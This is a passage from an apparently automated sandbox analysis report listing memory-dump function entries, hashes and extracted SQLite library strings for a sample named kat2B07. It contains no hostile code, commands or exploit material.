                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: integer overflow
                                                                • API String ID: 0-1678498654
                                                                • Opcode ID: b291dfa1ebf5b148e2b626a6176fa1451b16ea2ea0579780dbfc7de78d063128
                                                                • Instruction ID: 1ae5de83dbd4791b8b17ab0e77a38df9ceb1cd5489f5ed4b0938f6f046ef6304
                                                                • Opcode Fuzzy Hash: b291dfa1ebf5b148e2b626a6176fa1451b16ea2ea0579780dbfc7de78d063128
                                                                • Instruction Fuzzy Hash: 7A11D376C08611AADB02AE24BC08B9AB7A55F12330F26878AE5555A1B2E77095D4C3D3
                                                                Strings
                                                                • misuse, xrefs: 1D742406
                                                                • %s at line %d of [%.10s], xrefs: 1D74240B
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7423FC
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-3564305576
                                                                • Opcode ID: 44a6bf8a68a7ebbe23ca6b776678810504c29090fdc8a9786796c86883bb2699
                                                                • Instruction ID: 1df85cd2a4f6444f42dd94bd15a7ee32ab25669711878d48aa2a98c4300c6c3f
                                                                • Opcode Fuzzy Hash: 44a6bf8a68a7ebbe23ca6b776678810504c29090fdc8a9786796c86883bb2699
                                                                • Instruction Fuzzy Hash: 0011AC74204202EFD709CE0CDCD0E6AB7A4BF88714F1280ADE6458F252D731E896DB92
                                                                Strings
                                                                • JSON path error near '%q', xrefs: 1D7E1F92
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: JSON path error near '%q'
                                                                • API String ID: 0-481711382
                                                                • Opcode ID: 0b5857cfd51a094f773d3b0407596a1b34c15e924b997cfdd8303d410f9d9ab0
                                                                • Instruction ID: 1f603880c83242e8ba3347c6430cbf79fc78e16533e9398e7a60fe925b68168c
                                                                • Opcode Fuzzy Hash: 0b5857cfd51a094f773d3b0407596a1b34c15e924b997cfdd8303d410f9d9ab0
                                                                • Instruction Fuzzy Hash: BE01E1B260D211BEDB249A54AC01BABBBD4DB41271F21062DF999972E1DB71A81183E3
                                                                Strings
                                                                • misuse, xrefs: 1D741E59
                                                                • %s at line %d of [%.10s], xrefs: 1D741E63
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D741E53
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-3564305576
                                                                • Opcode ID: 8d12f7cb2d3c86683509d90c2c94c188f859b03017f74ec55437ef8e4a92b480
                                                                • Instruction ID: 31a8538e1421e634d8afdd6000418dcf95ca57235e9fc1cc5c4fefc853df4a7b
                                                                • Opcode Fuzzy Hash: 8d12f7cb2d3c86683509d90c2c94c188f859b03017f74ec55437ef8e4a92b480
                                                                • Instruction Fuzzy Hash: 6911C438308560DBD306EE28E844B57BB78BF46626F15829EE955CB322D330E505C7A3
                                                                Strings
                                                                • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1D75F105
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                                • API String ID: 0-2312637080
                                                                • Opcode ID: 73aa1f02af5a0ad3241f8723b1fad85bafe3b37aadbe253f32814e3828b4aa52
                                                                • Instruction ID: 8a750ec9aae84745a0425144e6ef92a1ab8ab4cd724d6f99e6bba2a0a4057ecc
                                                                • Opcode Fuzzy Hash: 73aa1f02af5a0ad3241f8723b1fad85bafe3b37aadbe253f32814e3828b4aa52
                                                                • Instruction Fuzzy Hash: 3D01B5377082416ED321966EFC44FA7F7E8EBC4231F05046EF5ADC3211D361A8858362
                                                                Strings
                                                                • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1D760D87
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                                • API String ID: 0-2312637080
                                                                • Opcode ID: 17d4b881cd4b23427a867eb69d1372982fe730547eb5eb4cc2b6ec9f5c1ed7fa
                                                                • Instruction ID: 7f9775f645df46c225da88f99929e9a88b1c7e257f24854ce5647b632e255b61
                                                                • Opcode Fuzzy Hash: 17d4b881cd4b23427a867eb69d1372982fe730547eb5eb4cc2b6ec9f5c1ed7fa
                                                                • Instruction Fuzzy Hash: 6601D176204210AFE310DA4DEC80F52B7E9EB88324F01056DFA4CD7280E772FC418762
                                                                Strings
                                                                • misuse, xrefs: 1D73EFB0
                                                                • %s at line %d of [%.10s], xrefs: 1D73EFB5
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D73EFA6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-3564305576
                                                                • Opcode ID: 56f601f95593217d646cdfff00d50402469b696bf033af5b0fc9f13e3034d575
                                                                • Instruction ID: 06840bc3726072c347bed08ce3bba877ddb7cec7b178f90cee35db06be59f7be
                                                                • Opcode Fuzzy Hash: 56f601f95593217d646cdfff00d50402469b696bf033af5b0fc9f13e3034d575
                                                                • Instruction Fuzzy Hash: DA01DEB0A0A622EBD700CF08DC84B5A3BB1AFC2356F094669E5486F342D375E845CF93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s_stat
                                                                • API String ID: 0-920702477
                                                                • Opcode ID: 6a8a9b809ffd38554ba62bd4277e312addbaeeb12f95632edb60c0ac609adc2c
                                                                • Instruction ID: 18e9bb9798b2e4fc635c6ca2aa4965d57ad5fcc910895c3fb69a2570672c1b48
                                                                • Opcode Fuzzy Hash: 6a8a9b809ffd38554ba62bd4277e312addbaeeb12f95632edb60c0ac609adc2c
                                                                • Instruction Fuzzy Hash: 46F09722A082527BE70042B9FC88B46EBC5AB44031F494626E50C92120C312BCA183D2
                                                                Strings
                                                                • CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 1D757F76
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
                                                                • API String ID: 0-3072645960
                                                                • Opcode ID: 52374d21fef6ab1cf4b54e17361db7dcfb14d41c68a49126ebdce5eecd2b83ad
                                                                • Instruction ID: 594018f0bcb4f8af70b6c4c79736c85387352581bde11b0fb54e688b3d09db58
                                                                • Opcode Fuzzy Hash: 52374d21fef6ab1cf4b54e17361db7dcfb14d41c68a49126ebdce5eecd2b83ad
                                                                • Instruction Fuzzy Hash: F0F0F63A64834296DB109F19FC05B89B790AFD0332F16012AF94896290E760A88683A3
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D7700EA
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7700DB
                                                                • database corruption, xrefs: 1D7700E5
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 786ff46137dee0294a1110e05e3cef3cee410bb9749e44faed95656bda73021f
                                                                • Instruction ID: 33e93b1903d8400ef0677795ed6b38bcf90648ce99f3381786db2b8e1e51e93c
                                                                • Opcode Fuzzy Hash: 786ff46137dee0294a1110e05e3cef3cee410bb9749e44faed95656bda73021f
                                                                • Instruction Fuzzy Hash: 8AE0E568740155ABDB05D924CD85FB377A16B40720F864896E415DB253E760E890D763
                                                                Strings
                                                                • cannot open file, xrefs: 1D836B59
                                                                • %s at line %d of [%.10s], xrefs: 1D836B5E
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D836B50
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-1799306995
                                                                • Opcode ID: 9ebdddb8c16f79bdbe999efb8f246a9373a6a79fbeb3aa5bb327317c64b544ff
                                                                • Instruction ID: 1596ef129ad2c71025b82d84450a61dfab4a06bcb54afb747d68128d952517fc
                                                                • Opcode Fuzzy Hash: 9ebdddb8c16f79bdbe999efb8f246a9373a6a79fbeb3aa5bb327317c64b544ff
                                                                • Instruction Fuzzy Hash: 65B0929A504290B6DB40BD58DC41FE72D1167D0715F8688FEB29D792A7F096D0908213
                                                                Strings
                                                                • %s at line %d of [%.10s], xrefs: 1D83A57E
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D83A570
                                                                • database corruption, xrefs: 1D83A579
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 5e5efcadfcb71d3cbd94cbda28a83ff8c284aad84818ffd055767d40ac72403a
                                                                • Instruction ID: de57b7dc7be51fff0c5f686d8ea91c4c9f17764f9e70cafb771fd50a85b4bb92
                                                                • Opcode Fuzzy Hash: 5e5efcadfcb71d3cbd94cbda28a83ff8c284aad84818ffd055767d40ac72403a
                                                                • Instruction Fuzzy Hash: F0B092AD504210B2DB00B958DD02FE73D105BD0745F8288BEB25D6A2A3F22594108253
                                                                Strings
                                                                • misuse, xrefs: 1D86C1F9
                                                                • %s at line %d of [%.10s], xrefs: 1D86C1FE
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D86C1F0
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-3564305576
                                                                • Opcode ID: f7146e52665e83879b6ae1957187d68239e61854d721e36d00d412b499464a4e
                                                                • Instruction ID: 13da0b04628a80c824bcfea5b0abe8a7a6c4e48cf88a6277ddd2e228fe7f5549
                                                                • Opcode Fuzzy Hash: f7146e52665e83879b6ae1957187d68239e61854d721e36d00d412b499464a4e
                                                                • Instruction Fuzzy Hash: FBB092AD514A58F6DB00A948DC81EEA69116BD031BF8280BEB6A9AD2A7F06590106213
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67c02bd86316d69d21778004ae7eae71b5685ba7c219aaaded33d145555d2578
                                                                • Instruction ID: bafce25b632b91614ca045868da4e71080c2067b14690bd314f085a5d99a2e4c
                                                                • Opcode Fuzzy Hash: 67c02bd86316d69d21778004ae7eae71b5685ba7c219aaaded33d145555d2578
